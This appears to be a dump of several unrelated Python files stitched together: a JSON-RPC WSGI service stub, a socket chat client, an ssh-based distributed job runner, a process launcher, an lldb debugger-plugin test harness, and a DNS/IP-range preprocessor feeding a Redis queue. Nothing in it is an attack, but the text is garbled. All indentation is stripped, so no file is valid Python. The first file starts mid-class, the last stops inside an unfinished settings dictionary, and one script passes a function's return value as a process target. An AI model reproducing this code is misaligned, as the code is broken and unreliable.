# Wrap the wsgi handler in a class definition so that we can
# do some initialization and avoid regenerating stuff over
# and over
def logcallback(self):
self.serverlog.set_log_file(self.userlog.get_log_file())
def log(self, level, context, message):
self.serverlog.log_message(level, message, context['client_ip'],
context['user_id'], context['module'],
context['method'], context['call_id'])
def __init__(self):
submod = get_service_name() or 'ccl_ContigFilter'
self.userlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, changecallback=self.logcallback,
config=get_config_file())
self.serverlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, logfile=self.userlog.get_log_file())
self.serverlog.set_log_level(6)
self.rpc_service = JSONRPCServiceCustom()
self.method_authentication = dict()
self.rpc_service.add(impl_ccl_ContigFilter.run_ccl_ContigFilter,
name='ccl_ContigFilter.run_ccl_ContigFilter',
types=[dict])
self.method_authentication['ccl_ContigFilter.run_ccl_ContigFilter'] = 'required' # noqa
self.rpc_service.add(impl_ccl_ContigFilter.run_ccl_ContigFilter_max,
name='ccl_ContigFilter.run_ccl_ContigFilter_max',
types=[dict])
self.method_authentication['ccl_ContigFilter.run_ccl_ContigFilter_max'] = 'required' # noqa
self.rpc_service.add(impl_ccl_ContigFilter.status,
name='ccl_ContigFilter.status',
types=[dict])
authurl = config.get(AUTH) if config else None
self.auth_client = _KBaseAuth(authurl)
def __call__(self, environ, start_response):
# Context object, equivalent to the perl impl CallContext
ctx = MethodContext(self.userlog)
ctx['client_ip'] = getIPAddress(environ)
status = '500 Internal Server Error'
try:
body_size = int(environ.get('CONTENT_LENGTH', 0))
except (ValueError):
body_size = 0
if environ['REQUEST_METHOD'] == 'OPTIONS':
# we basically do nothing and just return headers
status = '200 OK'
rpc_result = ""
else:
request_body = environ['wsgi.input'].read(body_size)
try:
req = json.loads(request_body)
except ValueError as ve:
err = {'error': {'code': -32700,
'name': "Parse error",
'message': str(ve),
}
}
rpc_result = self.process_error(err, ctx, {'version': '1.1'})
else:
ctx['module'], ctx['method'] = req['method'].split('.')
ctx['call_id'] = req['id']
ctx['rpc_context'] = {
'call_stack': [{'time': self.now_in_utc(),
'method': req['method']}
]
}
prov_action = {'service': ctx['module'],
'method': ctx['method'],
'method_params': req['params']
}
ctx['provenance'] = [prov_action]
try:
token = environ.get('HTTP_AUTHORIZATION')
# parse out the method being requested and check if it
# has an authentication requirement
method_name = req['method']
auth_req = self.method_authentication.get(
method_name, 'none')
if auth_req != 'none':
if token is None and auth_req == 'required':
err = JSONServerError()
err.data = (
'Authentication required for ' +
'ccl_ContigFilter ' +
'but no authentication header was passed')
raise err
elif token is None and auth_req == 'optional':
pass
else:
try:
user = self.auth_client.get_user(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
except Exception as e:
if auth_req == 'required':
err = JSONServerError()
err.data = \
"Token validation failed: %s" % e
raise err
if (environ.get('HTTP_X_FORWARDED_FOR')):
self.log(log.INFO, ctx, 'X-Forwarded-For: ' +
environ.get('HTTP_X_FORWARDED_FOR'))
self.log(log.INFO, ctx, 'start method')
rpc_result = self.rpc_service.call(ctx, req)
self.log(log.INFO, ctx, 'end method')
status = '200 OK'
except JSONRPCError as jre:
err = {'error': {'code': jre.code,
'name': jre.message,
'message': jre.data
}
}
trace = jre.trace if hasattr(jre, 'trace') else None
rpc_result = self.process_error(err, ctx, req, trace)
except Exception:
err = {'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error ' +
'occurred',
}
}
rpc_result = self.process_error(err, ctx, req,
traceback.format_exc())
# print('Request method was %s\n' % environ['REQUEST_METHOD'])
# print('Environment dictionary is:\n%s\n' % pprint.pformat(environ))
# print('Request body was: %s' % request_body)
# print('Result from the method call is:\n%s\n' % \
# pprint.pformat(rpc_result))
if rpc_result:
response_body = rpc_result
else:
response_body = ''
response_headers = [
('Access-Control-Allow-Origin', '*'),
('Access-Control-Allow-Headers', environ.get(
'HTTP_ACCESS_CONTROL_REQUEST_HEADERS', 'authorization')),
('content-type', 'application/json'),
('content-length', str(len(response_body)))]
start_response(status, response_headers)
return [response_body.encode('utf8')]
def process_error(self, error, context, request, trace=None):
if trace:
self.log(log.ERR, context, trace.split('\n')[0:-1])
if 'id' in request:
error['id'] = request['id']
if 'version' in request:
error['version'] = request['version']
e = error['error'].get('error')
if not e:
error['error']['error'] = trace
elif 'jsonrpc' in request:
error['jsonrpc'] = request['jsonrpc']
error['error']['data'] = trace
else:
error['version'] = '1.0'
error['error']['error'] = trace
return json.dumps(error)
def now_in_utc(self):
# noqa Taken from http://stackoverflow.com/questions/3401428/how-to-get-an-isoformat-datetime-string-including-the-default-timezone @IgnorePep8
dtnow = datetime.datetime.now()
dtutcnow = datetime.datetime.utcnow()
delta = dtnow - dtutcnow
hh, mm = divmod((delta.days * 24 * 60 * 60 + delta.seconds + 30) // 60,
60)
return "%s%+02d:%02d" % (dtnow.isoformat(), hh, mm)
application = Application()
# This is the uwsgi application dictionary. On startup uwsgi will look
# for this dict and pull its configuration from here.
# This simply lists where to "mount" the application in the URL path
#
# This uwsgi module "magically" appears when running the app within
# uwsgi and is not available otherwise, so wrap an exception handler
# around it
#
# To run this server in uwsgi with 4 workers listening on port 9999 use:
# uwsgi -M -p 4 --http :9999 --wsgi-file _this_file_
# To run a using the single threaded python BaseHTTP service
# listening on port 9999 by default execute this file
#
try:
import uwsgi
# Before we do anything with the application, see if the
# configs specify patching all std routines to be asynch
# *ONLY* use this if you are going to wrap the service in
# a wsgi container that has enabled gevent, such as
# uwsgi with the --gevent option
if config is not None and config.get('gevent_monkeypatch_all', False):
print("Monkeypatching std libraries for async")
from gevent import monkey
monkey.patch_all()
uwsgi.applications = {'': application}
except ImportError:
# Not available outside of wsgi, ignore
pass
_proc = None
def start_server(host='localhost', port=0, newprocess=False):
'''
By default, will start the server on localhost on a system assigned port
in the main thread. Excecution of the main thread will stay in the server
main loop until interrupted. To run the server in a separate process, and
thus allow the stop_server method to be called, set newprocess = True. This
will also allow returning of the port number.'''
global _proc
if _proc:
raise RuntimeError('server is already running')
httpd = make_server(host, port, application)
port = httpd.server_address[1]
print("Listening on port %s" % port)
if newprocess:
_proc = Process(target=httpd.serve_forever)
_proc.daemon = True
_proc.start()
else:
httpd.serve_forever()
return port
def stop_server():
global _proc
_proc.terminate()
_proc = None
def process_async_cli(input_file_path, output_file_path, token):
exit_code = 0
with open(input_file_path) as data_file:
req = json.load(data_file)
if 'version' not in req:
req['version'] = '1.1'
if 'id' not in req:
req['id'] = str(_random.random())[2:]
ctx = MethodContext(application.userlog)
if token:
user = application.auth_client.get_user(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
if 'context' in req:
ctx['rpc_context'] = req['context']
ctx['CLI'] = 1
ctx['module'], ctx['method'] = req['method'].split('.')
prov_action = {'service': ctx['module'], 'method': ctx['method'],
'method_params': req['params']}
ctx['provenance'] = [prov_action]
resp = None
try:
resp = application.rpc_service.call_py(ctx, req)
except JSONRPCError as jre:
trace = jre.trace if hasattr(jre, 'trace') else None
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': jre.code,
'name': jre.message,
'message': jre.data,
'error': trace}
}
except Exception:
trace = traceback.format_exc()
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error occurred',
'error': trace}
}
if 'error' in resp:
exit_code = 500
with open(output_file_path, "w") as f:
f.write(json.dumps(resp, cls=JSONObjectEncoder))
return exit_code
if __name__ == "__main__":
if (len(sys.argv) >= 3 and len(sys.argv) <= 4 and
os.path.isfile(sys.argv[1])):
token = None
if len(sys.argv) == 4:
if os.path.isfile(sys.argv[3]):
with open(sys.argv[3]) as token_file:
token = token_file.read()
else:
token = sys.argv[3]
sys.exit(process_async_cli(sys.argv[1], sys.argv[2], token))
try:
opts, args = getopt(sys.argv[1:], "", ["port=", "host="])
except GetoptError as err:
# print help information and exit:
print(str(err)) # will print something like "option -a not recognized"
sys.exit(2)
port = 9999
host = 'localhost'
for o, a in opts:
if o == '--port':
port = int(a)
elif o == '--host':
host = a
print("Host set to %s" % host)
else:
assert False, "unhandled option"
start_server(host=host, port=port)
# print("Listening on port %s" % port)
# httpd = make_server( host, port, application)
#
# httpd.serve_forever()
|
client.py
|
import socket
import threading
import platform
import os
from better_profanity import profanity
import colorgb
from time import sleep
class Client:
"""A class that implements the server side.
-----------
Parameters :
- username: `str` | set your username to connect to server.
- username_color: `str` | Set your username color. Scroll down to see the list of available colors. (Default: `None`)
- badword_filter: `True/False` | Filter badword message. (Default : True)
----
Basic Colors :
- `black`
- `red`
- `green`
- `yellow`
- `blue`
- `purple`
- `cyan`
- `white`
-----
Light Colors :
- `grey`
- `lred`
- `lgreen`
- `lyellow`
- `lblue`
- `lpurple`
- `lcyan`
"""
def __init__(self, username:str, username_color:str=None, badword_filter=True):
if username_color == None:
self.username = username
else:
self.username = f"{colorgb.fore(username, username_color)}"
self.badword_filter = badword_filter
def connect(self, server_ip:str, server_port:int):
r"""Connect to the server
-----------
Parameters :
- server_ip: :function:`str` | Server IP
- server_port: :function:`int` | Server Port
"""
nickname = self.username
try:
print(f"Connecting to {server_ip}:{server_port}...")
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client.connect((server_ip, server_port))
except socket.error as error:
print()
print(colorgb.fore("An error occurred :", "lred"))
sleep(0.5)
print(error)
print()
client.close()
exit()
def receive():
badword_filter = self.badword_filter
while True:
try:
message = client.recv(1024).decode('UTF-8')
if message == 'NICK':
client.send(nickname.encode('UTF-8'))
else:
if badword_filter == True:
censored = profanity.censor(message)
print(censored)
else:
print(message)
except socket.error as error:
print()
print(colorgb.fore("An error occurred :", "lred"))
sleep(0.5)
print(error)
client.close()
exit()
def write():
while True:
input_msg = input('')
if input_msg == "//clear":
if platform.uname()[0] == "Windows":
os.system("cls")
else:
os.system("clear")
else:
message = f'{nickname}: {input_msg}'
client.send(message.encode('UTF-8'))
receive_thread = threading.Thread(target=receive)
receive_thread.start()
write_thread = threading.Thread(target=write)
write_thread.start()
|
process.py
|
import logging
import multiprocessing
import multiprocessing.managers
import os
import socket
import stat
import subprocess
import time
from queue import Queue
import numpy
from .util import substitute_file, create_scratch_directory, CalcItJobCreateError
# delays in seconds to different processes
MANAGER_SHUTDOWN_DELAY = 3
JOB_QUEUE_NAME = 'get_job_queue'
RES_QUEUE_NAME = 'get_result_queue'
#logging.basicConfig(level=logging.INFO)
def process_jobs(port, authorization_key, jobs, nodes, jobs_per_node, work_dir, remote_shell, global_paths, do_execute):
""" Parallel processing of jobs that are given in a script, the name of
which is in the filenames list and located in a directory given in the
list of directories.
Arguments:
port -- the port used for communation
authorization_key -- program secret used to identify correct server
jobs -- the jobs to execute
nodes -- list of nodes to use during processing
jobs_per_node -- number of jobs to start per node
work_dir -- the work directory where the slave should be launched from
remote_shell -- the remote shell to use when connecting to nodes
global_paths -- directories used to find calcit and its data folders.
NB! This is different from work_dir and scratch directories
in that global_paths have nothing to do with computations
do_execute -- whether or not to actually execute calculations
"""
def send_jobs_to_queue(jobs, job_queue):
""" Sends jobs to the job queue specified on input
We wrap it like this so we can shutdown the server appropriately
without causing hangups
Raises:
CalcItJobCreateError if there was an error creating the job
Arguments:
jobs -- the jobs to be processed
job_queue -- the queue to submit the jobs to
"""
total_job_count = len(jobs)
logging.info("Submitting {0:3d} jobs to the queue.".format(total_job_count))
for job_index, job in enumerate(jobs, start=1):
job_str = repr(job)
try:
command = job.cmd(global_paths)
except:
raise
else:
cmd = (job_str, command)
logging.info("Job '{0[0]:s}' added to queue. Command is '{0[1]:s}'".format(cmd))
if do_execute:
job_queue.put(cmd)
return total_job_count
def retrieve_jobs_from_queue(total_job_count, result_queue):
""" Retrieve jobs from the processing queue
Arguments:
total_job_count -- the number of jobs we expect
result_queue -- the queue to retrieve jobs from
"""
jobs_completed = 0
while jobs_completed < total_job_count:
if not do_execute:
break
job_name, time_to_complete, stdout, stderr = result_queue.get()
jobs_completed += 1
logging.info("Finished '{2:s}' ({0:d} of {1:3d}) in {3:9.2f}s.".format(jobs_completed, total_job_count, job_name, time_to_complete))
if len(stdout[:-1]) > 0:
logging.info("{0:s} STDOUT: {1:s}".format(job_name, stdout[:-1].decode('utf8')))
if not do_execute:
return
authorization_key_encoded = authorization_key.encode("utf-8")
# get hostname of running script to pass to slaves
host = socket.gethostname()
# create manager and queues
# logging.info("Creating manager".format())
server, job_queue, result_queue = start_server(port, authorization_key_encoded)
# start the slaves on the remote nodes
start_slaves(host, port, authorization_key, nodes, jobs_per_node, work_dir, remote_shell, global_paths)
try:
# send jobs to job queue
total_job_count = send_jobs_to_queue(jobs, job_queue)
# retrieve results from slaves
retrieve_jobs_from_queue(total_job_count, result_queue)
finally:
# shutdown server.
stop_server(server)
def start_server(port, authorization_key):
""" Starts the server on the master node
Arguments:
port -- Port to use for communication
authorization_key -- program secret used to identify correct server
"""
logging.info("Starting server on port {0:d}".format(port, authorization_key))
manager = make_server_manager(port, authorization_key)
manager.start()
job_queue = manager.get_job_queue()
result_queue = manager.get_result_queue()
return manager, job_queue, result_queue
def stop_server(manager):
""" Stops the server on the master node when all jobs have finished
Arguments:
manager -- the server to stop
"""
logging.info("Shutting down server.")
time.sleep(MANAGER_SHUTDOWN_DELAY) # needed to prevent hanging
manager.shutdown()
def make_server_manager(port, authorization_key):
""" Create a manager for the server, listening on the given port.
Return a manager object with get_job_q and get_result_q
methods.
Arguments:
port -- Port to use for communication
authorization_key -- program secret used to identify correct server
Returns:
Manager to process jobs
"""
job_queue = Queue()
result_queue = Queue()
class JobQueueManager(multiprocessing.managers.SyncManager):
pass
JobQueueManager.register(JOB_QUEUE_NAME, callable=lambda: job_queue)
JobQueueManager.register(RES_QUEUE_NAME, callable=lambda: result_queue)
manager = JobQueueManager(address=('', port), authkey=authorization_key)
return manager
def start_slaves(server, port, authorization_key, nodes, jobs_per_node, work_dir, remote_shell, global_paths):
""" Start slave prcesses on remote computers.
Arguments:
server -- the master server that the slaves connect to
port -- the port used for communation
authorization_key -- program secret used to identify correct server
nodes -- list of nodes to use during processing
jobs_per_node -- number of jobs to start per node
work_dir -- the work directory where the slaves should be launched from
remote_shell -- the remote shell to use when connecting to nodes
global_paths -- directories used to find calcit and its data folders.
NB! This is different from work_dir and scratch directories
in that global_paths have nothing to do with computations
"""
share_path = global_paths['share']
# write scripts to start slave nodes
write_slave_python_script(server, port, authorization_key, jobs_per_node, share_path)
slave_execute_script = write_slave_execute_script(work_dir, remote_shell, share_path)
procs = []
for node in nodes:
command_to_execute = "./{0} {1}".format(slave_execute_script, node)
logging.info("executing command '{0:s}' on node {1:s}".format(command_to_execute, node))
process = multiprocessing.Process(target=execute, args=(command_to_execute,))
procs.append(process)
process.start()
def execute(command, is_slave=False):
""" Executes command given an argument through a shell
If is_slave is True there will be a delay added through
the global constant CLIENT_RETURN_DELAY
This command will also calculate the time it took for
execution (sans CLIENT_RETURN_DELAY) and return it
Arguments:
command -- command line arguments to run a job
is_slave -- if True then the execute process will be delayed before returning
"""
t0 = numpy.asarray(time.time(),dtype=numpy.float64)
process = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
output, error = process.communicate()
t1 = numpy.asarray(time.time(),dtype=numpy.float64)
return output, error, t1 - t0
def write_slave_execute_script(work_dir, remote_shell, share_path):
""" Writes the slave shell script that launches worker slaves
on remote nodes.
Uses start_slaves.bash from the data directory.
TODO: make it work for other shells too.
Arguments:
work_dir -- the work directory where the slaves should be launched from
remote_shell -- the remote shell to use when connecting to nodes
share_path -- the directory of common template files
Returns:
filename of slave python script
"""
if remote_shell != 'ssh':
raise NotImplementedError("You specified remote shell '{0}' which is not implemented.".format(remote_shell))
filename_in = os.path.join(share_path, "start_slaves.bash")
filename_out = "start_slaves.sh"
substitutions = {'WORK_DIR': work_dir, 'REMOTE_SHELL': remote_shell}
substitute_file(filename_in, filename_out, substitutions)
os.chmod(filename_out, stat.S_IRWXU or stat.S_IRGRP or stat.S_IROTH)
return filename_out
def write_slave_python_script(server, port, authorization_key, jobs_per_node, share_path):
""" Writes the slave script that connects to the server.
Uses slave.py from the share directory.
Arguments:
server -- adress of the master that the slaves connect to
port -- the port used for communation
authorization_key -- program secret used to identify correct server
jobs_per_node -- the number of jobs each node can run
share_path -- the directory of common template files
Returns:
filename of slave python script
"""
filename_in = os.path.join(share_path, "slave.py")
filename_out = "slave.py"
substitutions = {'PORT': str(port),
'HOSTNAME': server,
'AUTHKEY': authorization_key,
'JOBS_PER_NODE': str(jobs_per_node)}
substitute_file(filename_in, filename_out, substitutions)
return filename_out
|
init.py
|
import multiprocessing
import threading
import sys
from time import sleep
import os
# Some import "magic" to import from other directories; (see issue #1)
this_dir = os.path.dirname(os.path.realpath(__file__))
os.chdir(this_dir)
sys.path.insert(0, '../server/')
sys.path.insert(0, '../client') # TODO: Directory restructure; We shouldn't have to modify PYTHON_PATH
actions = ['server.py', 'client.py']
PORT = 3705
network_architecture = "mesh"
def worker(action): # Worker function
import init_server
import init_client
global network_architecture
print('action:', action)
if action == 'server.py':
print("Initializing server...")
# Apparently multiprocessing doesn't like starting things that include while loops in the main process,
# so instead, we'll start the server in a thread (of a child process of a process)
thread = threading.Thread(target=init_server.init, args=(network_architecture,))
thread.start()
print('Server has been successfully initialized')
elif action == 'client.py':
print("Initializing client...")
thread = threading.Thread(target=init_client.init)
thread.start()
print('Client has been successfully initialized')
if __name__ == '__main__':
jobs = []
for i in range(0, 2):
p = multiprocessing.Process(target=worker(actions[i]))
jobs.append(p)
p.start()
sleep(1)
|
test_libsosplugin.py
|
from __future__ import print_function
import unittest
import argparse
import re
import tempfile
import subprocess
import threading
import os
import sys
import inspect
lldb = ''
clrdir = ''
workdir = ''
corerun = ''
sosplugin = ''
assembly = ''
fail_flag = ''
fail_flag_lldb = ''
summary_file = ''
timeout = 0
regex = ''
repeat = 0
def runWithTimeout(cmd):
p = None
def run():
global p
p = subprocess.Popen(cmd, shell=True)
p.communicate()
thread = threading.Thread(target=run)
thread.start()
thread.join(timeout)
if thread.is_alive():
with open(summary_file, 'a+') as summary:
print('Timeout!', file=summary)
p.kill()
thread.join()
class TestSosCommands(unittest.TestCase):
def do_test(self, command):
open(fail_flag, 'a').close()
try:
os.unlink(fail_flag_lldb)
except:
pass
cmd = (('%s -b ' % lldb) +
("-k \"script open('%s', 'a').close()\" " % fail_flag_lldb) +
("-k 'quit' ") +
("--no-lldbinit ") +
("-O \"plugin load %s \" " % sosplugin) +
("-o \"script import testutils as test\" ") +
("-o \"script test.fail_flag = '%s'\" " % fail_flag) +
("-o \"script test.summary_file = '%s'\" " % summary_file) +
("-o \"script test.run('%s', '%s')\" " % (assembly, command)) +
("-o \"quit\" ") +
(" -- %s %s > %s.log 2> %s.log.2" % (corerun, assembly,
command, command)))
runWithTimeout(cmd)
self.assertFalse(os.path.isfile(fail_flag))
self.assertFalse(os.path.isfile(fail_flag_lldb))
try:
os.unlink(fail_flag)
except:
pass
try:
os.unlink(fail_flag_lldb)
except:
pass
def t_cmd_bpmd_nofuturemodule_module_function(self):
self.do_test('t_cmd_bpmd_nofuturemodule_module_function')
def t_cmd_bpmd_module_function(self):
self.do_test('t_cmd_bpmd_module_function')
def t_cmd_bpmd_module_function_iloffset(self):
self.do_test('t_cmd_bpmd_module_function_iloffset')
def t_cmd_bpmd_methoddesc(self):
self.do_test('t_cmd_bpmd_methoddesc')
def t_cmd_bpmd_clearall(self):
self.do_test('t_cmd_bpmd_clearall')
def t_cmd_clrstack(self):
self.do_test('t_cmd_clrstack')
def t_cmd_clrthreads(self):
self.do_test('t_cmd_clrthreads')
def t_cmd_clru(self):
self.do_test('t_cmd_clru')
def t_cmd_dumpclass(self):
self.do_test('t_cmd_dumpclass')
def t_cmd_dumpheap(self):
self.do_test('t_cmd_dumpheap')
def t_cmd_dumpil(self):
self.do_test('t_cmd_dumpil')
def t_cmd_dumplog(self):
self.do_test('t_cmd_dumplog')
def t_cmd_dumpmd(self):
self.do_test('t_cmd_dumpmd')
def t_cmd_dumpmodule(self):
self.do_test('t_cmd_dumpmodule')
def t_cmd_dumpmt(self):
self.do_test('t_cmd_dumpmt')
def t_cmd_dumpobj(self):
self.do_test('t_cmd_dumpobj')
def t_cmd_dumpstack(self):
self.do_test('t_cmd_dumpstack')
def t_cmd_dso(self):
self.do_test('t_cmd_dso')
def t_cmd_eeheap(self):
self.do_test('t_cmd_eeheap')
def t_cmd_eestack(self):
self.do_test('t_cmd_eestack')
def t_cmd_gcroot(self):
self.do_test('t_cmd_gcroot')
def t_cmd_ip2md(self):
self.do_test('t_cmd_ip2md')
def t_cmd_name2ee(self):
self.do_test('t_cmd_name2ee')
def t_cmd_pe(self):
self.do_test('t_cmd_pe')
def t_cmd_histclear(self):
self.do_test('t_cmd_histclear')
def t_cmd_histinit(self):
self.do_test('t_cmd_histinit')
def t_cmd_histobj(self):
self.do_test('t_cmd_histobj')
def t_cmd_histobjfind(self):
self.do_test('t_cmd_histobjfind')
def t_cmd_histroot(self):
self.do_test('t_cmd_histroot')
def t_cmd_sos(self):
self.do_test('t_cmd_sos')
def t_cmd_soshelp(self):
self.do_test('t_cmd_soshelp')
def generate_report():
report = [{'name': 'TOTAL', True: 0, False: 0, 'completed': True}]
fail_messages = []
if not os.path.isfile(summary_file):
print('No summary file to process!')
return
with open(summary_file, 'r') as summary:
for line in summary:
if line.startswith('new_suite: '):
report.append({'name': line.split()[-1], True: 0, False: 0,
'completed': False, 'timeout': False})
elif line.startswith('True'):
report[-1][True] += 1
elif line.startswith('False'):
report[-1][False] += 1
elif line.startswith('Completed!'):
report[-1]['completed'] = True
elif line.startswith('Timeout!'):
report[-1]['timeout'] = True
elif line.startswith('!!! '):
fail_messages.append(line.rstrip('\n'))
for suite in report[1:]:
report[0][True] += suite[True]
report[0][False] += suite[False]
report[0]['completed'] &= suite['completed']
for line in fail_messages:
print(line)
print()
print('=' * 79)
print('{:72} {:6}'.format('Test suite', 'Result'))
print('-' * 79)
for suite in report[1:]:
if suite['timeout']:
result = 'Timeout'
elif suite[False]:
result = 'Fail'
elif not suite['completed']:
result = 'Crash'
elif suite[True]:
result = 'Success'
else:
result = 'Please, report'
print('{:68} {:>10}'.format(suite['name'], result))
print('=' * 79)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--lldb', default='lldb')
parser.add_argument('--clrdir', default='.')
parser.add_argument('--workdir', default='.')
parser.add_argument('--assembly', default='Test.exe')
parser.add_argument('--timeout', default=90)
parser.add_argument('--regex', default='t_cmd_')
parser.add_argument('--repeat', default=1)
parser.add_argument('unittest_args', nargs='*')
args = parser.parse_args()
lldb = args.lldb
clrdir = args.clrdir
workdir = args.workdir
assembly = args.assembly
timeout = int(args.timeout)
regex = args.regex
repeat = int(args.repeat)
print("lldb: %s" % lldb)
print("clrdir: %s" % clrdir)
print("workdir: %s" % workdir)
print("assembly: %s" % assembly)
print("timeout: %i" % timeout)
print("regex: %s" % regex)
print("repeat: %i" % repeat)
corerun = os.path.join(clrdir, 'corerun')
sosplugin = os.path.join(clrdir, 'libsosplugin.so')
if os.name != 'posix':
print('Not implemented: corerun.exe, sosplugin.dll?')
exit(1)
print("corerun: %s" % corerun)
print("sosplugin: %s" % sosplugin)
fail_flag = os.path.join(workdir, 'fail_flag')
fail_flag_lldb = os.path.join(workdir, 'fail_flag.lldb')
print("fail_flag: %s" % fail_flag)
print("fail_flag_lldb: %s" % fail_flag_lldb)
summary_file = os.path.join(workdir, 'summary')
print("summary_file: %s" % summary_file)
try:
os.unlink(summary_file)
except:
pass
sys.argv[1:] = args.unittest_args
suite = unittest.TestSuite()
all_tests = inspect.getmembers(TestSosCommands, predicate=inspect.ismethod)
for (test_name, test_func) in all_tests:
if re.match(regex, test_name):
suite.addTest(TestSosCommands(test_name))
unittest.TextTestRunner(verbosity=1).run(suite)
generate_report()
|
preprocessing.py
|
import re
import os
from urllib.parse import urlparse
import dns.resolver
import dns.rdtypes.IN.A
from IPy import IP
from itertools import chain
from concurrent.futures import ThreadPoolExecutor
from redisqueue.scheduler import DupeFilterScheduler
import importlib
import six
import time
from redisqueue import connection
import logging
from watchdog.observers import Observer
from watchdog.events import FileSystemEventHandler
IPADDR_PATTERN = re.compile(r'(?:\d+\.){3}\d+')
DOMAIN_PATTERN = re.compile(r'(?:\w+\.){1,}\w+')
IPADDR_FIELD_PATTERN = re.compile(r'(?:\d+\.){3}\d+[-~](?:\d+\.){3}\d+')
class Preprocessing(DupeFilterScheduler, FileSystemEventHandler):
"""
用于对入库的数据进行预处理,包括格式检查、url的话进行dns解析、入库ip去重、默认自动入库ip所在的C段地址段
"""
def __init__(self, server,
persist=False,
flush_on_start=False,
queue_key='queue:%(timestamp)s' % {'timestamp': int(time.time())},
queue_cls='redisqueue.rqueues.FifoQueue',
dupefilter_key='dupefilter:%(timestamp)s' % {'timestamp': int(time.time())},
dupefilter_cls='redisqueue.dupefilter.RFPDupeFilter',
dupefilter_debug=False,
idle_before_close=0,
serializer=None,
subnet_mask=32):
"""Initialize scheduler.
Parameters
----------
subnet_mask : int
以当前ip地址的多少子网掩码地址段来加入队列,默认就是当前地址,不取C段
"""
super().__init__(server, persist, flush_on_start, queue_key, queue_cls, dupefilter_key, dupefilter_cls, dupefilter_debug, idle_before_close, serializer)
self.subnet_mask = subnet_mask
@classmethod
def from_settings(cls, settings):
kwargs = {
'persist': settings.get('SCHEDULER_PERSIST', True),
'flush_on_start': settings.get('SCHEDULER_FLUSH_ON_START', False),
'queue_key': settings.get('SCHEDULER_QUEUE_KEY', 'queue:%(timestamp)s' % {'timestamp': int(time.time())}),
'queue_cls': settings.get('SCHEDULER_QUEUE_CLASS', 'redisqueue.rqueues.FifoQueue'),
'dupefilter_key': settings.get('SCHEDULER_DUPEFILTER_KEY', 'dupefilter:%(timestamp)s' % {'timestamp': int(time.time())}),
'dupefilter_cls': settings.get('SCHEDULER_DUPEFILTER_CLASS', 'redisqueue.dupefilter.RFPDupeFilter'),
'dupefilter_debug': settings.get('SCHEDULER_DUPEFILTER_DEBUG', False),
'idle_before_close': settings.get('SCHEDULER_IDLE_BEFORE_CLOSE', 0),
'serializer': settings.get('SCHEDULER_SERIALIZER', None),
'subnet_mask': settings.get('SUBNET_MASK', 32)
}
# Support serializer as a path to a module.
if isinstance(kwargs.get('serializer'), six.string_types):
kwargs['serializer'] = importlib.import_module(kwargs['serializer'])
server = connection.from_settings(settings)
# Ensure the connection is working.
server.ping()
return cls(server=server, **kwargs)
def dns_resolve(self, domain):
"""将域名解析成地址段
@param domain: 域名
@type domain: str
@return: 地址段生成器
@rtype : generator
"""
try:
a = dns.resolver.query(domain, 'A').response.answer
# 即便是只查A记录,最后还是可能会出dns.rdtypes.ANY.CNAME.CNAME类型的记录,所以需要判断是否是dns.rdtypes.IN.A.A
resolve_result = (j.address for i in a for j in i.items if isinstance(j, dns.rdtypes.IN.A.A))
ips = (ip for ip_net in (IP(ip).make_net(self.subnet_mask) for ip in resolve_result) for ip in ip_net)
except Exception:
ips = []
finally:
return ips
def regulate(self, address_range):
"""将不规范的地址段转换成单个ip的序列
:address_range: str
:returns: list
"""
if IPADDR_FIELD_PATTERN.search(address_range):
ip1_str, ip2_str = re.split('[-~]', address_range)
else:
raise ValueError('IP Address format was invalid')
ip1 = IP(ip1_str)
ip2 = IP(ip2_str)
length = abs(ip1.int() - ip2.int())
start_int = ip1.int() if ip1.int() < ip2.int() else ip2.int()
ips = []
for i in range(length+1):
ips.append(IP(start_int+i))
return ips
def ip_resolve(self, url_like):
"""解析IP地址字符串,
- 如果是/32地址则将该地址字符串转换为所在C段所有地址
- 如果是地址段,则返回该地址段所有地址
- 其他格式则抛出异常
@param url_like: 类似url格式的字符串
@type : str
@return: 地址段生成器
@rtype : generator
@raise e: 地址格式错误
"""
try:
ip = IP(url_like)
except ValueError as e:
ip = self.regulate(url_like)
finally:
if len(ip) > 1:
return (x for x in ip)
else:
return (x for x in ip.make_net(self.subnet_mask))
def resolve_single(self, url_like):
parse_result = urlparse(url_like)
hostname = parse_result.hostname
if hostname:
try:
ips = self.ip_resolve(hostname)
except ValueError:
ips = self.dns_resolve(hostname)
else:
try:
ips = self.ip_resolve(url_like)
except ValueError:
searched_ip = IPADDR_PATTERN.search(url_like)
searched_domain = DOMAIN_PATTERN.search(url_like)
if searched_ip:
ips = self.ip_resolve(searched_ip.group(0))
elif searched_domain:
ips = self.dns_resolve(searched_domain.group(0))
else:
ips = []
self.logger.info(f'{url_like}输入文档格式错误')
for ip in ips:
if self.enqueue(str(ip)):
self.logger.info(f'produce:{ip}')
def resolve_bulk(self, url_like_l, n=30):
with ThreadPoolExecutor(n) as pool:
pool.map(self.resolve_single, url_like_l)
def on_created(self, event):
try:
self.logger.info(f"found file {event.src_path} created!")
with open(event.src_path, encoding='utf8') as f:
data = (row.split(',')[0].strip() for row in f.readlines() if row.strip())
self.resolve_bulk(data)
except Exception as e:
self.logger.info(e)
def main(settings):
"""测试代码
:returns: TODO
"""
logging.basicConfig(level=logging.INFO,
format='%(asctime)s %(name)s[line:%(lineno)d] %(levelname)s %(message)s',
datefmt='%a, %d %b %Y %H:%M:%S')
p = Preprocessing.from_settings(settings)
p.open()
path = os.path.abspath(settings.get('INPUT_PATH', '.'))
if not os.path.exists(path):
os.makedirs(path)
p.logger.info(f"开始监控文件夹:{path}")
observer = Observer()
observer.schedule(p, path, recursive=True)
observer.start()
try:
while True:
time.sleep(1)
except KeyboardInterrupt:
observer.stop()
observer.join()
p.close()
if __name__ == "__main__":
settings = {'REDIS_HOST': '127.0.0.1',
'REDIS_PORT': 6888,
'SCHEDULER_SERIALIZER': 'json',
